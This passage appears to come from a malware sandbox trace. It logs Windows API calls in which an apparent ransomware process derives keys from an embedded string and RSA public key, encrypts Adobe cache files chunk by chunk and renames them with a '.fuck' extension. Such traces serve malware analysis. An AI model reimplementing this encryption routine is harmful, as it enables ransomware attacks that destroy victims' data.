pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.843] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0241.843] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x28f4610) returned 1 [0241.843] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4610, dwCertEncodingType=0x1, pInfo=0x2935370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29353a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29353a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x28e7bb8) returned 1 [0241.843] CryptEncrypt (in: hKey=0x28e7bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0241.843] CryptEncrypt (in: hKey=0x28e7bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f43f0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x28f43f0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0241.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x28f43f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x28f43f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0241.845] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.858] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.869] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.869] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.870] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.871] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.872] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x25e, lpOverlapped=0x0) returned 1 [0241.872] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x25e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0241.872] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0241.872] CloseHandle (hObject=0x5d44) returned 1 [0241.872] CloseHandle (hObject=0x5d48) returned 1 [0241.876] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst"), bFailIfExists=0) returned 1 [0241.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst", dwFileAttributes=0x0) returned 1 [0241.884] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst.gsg")) returned 1 [0241.886] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst.fuck")) returned 1 [0241.887] CryptDestroyHash (hHash=0x28e7f38) returned 1 [0241.887] CryptDestroyKey (hKey=0x28e7b38) returned 1 [0241.887] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.887] FindNextFileA (in: hFindFile=0x28e82b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0241.887] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0241.887] GetLastError () returned 0x0 [0241.887] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst")) returned 0x20 [0241.888] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst", dwFileAttributes=0x80) returned 1 [0241.889] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0241.890] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.890] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.891] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x28f6348) returned 1 [0241.894] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0241.894] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0241.894] CryptHashData (hHash=0x28e8078, pbData=0x28570d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.894] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x28e7df8) returned 1 [0241.894] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.894] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0241.894] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x28f49c8) returned 1 [0241.895] CryptImportPublicKeyInfo (in: hCryptProv=0x28f49c8, dwCertEncodingType=0x1, pInfo=0x2936550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936588*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x28e7f38) returned 1 [0241.895] CryptEncrypt (in: hKey=0x28e7f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0241.895] CryptEncrypt (in: hKey=0x28e7f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4830*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x28f4830*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0241.895] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4830*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x28f4830*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0241.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.898] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.898] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.902] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.902] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.902] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.903] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.903] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.903] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.903] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.903] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.904] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.904] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.904] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.904] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0241.904] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0241.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x25e, lpOverlapped=0x0) returned 1 [0241.905] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x25e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0241.905] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0241.905] CloseHandle (hObject=0x5d48) returned 1 [0241.905] CloseHandle (hObject=0x5d44) returned 1 [0241.908] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst" (normalized: 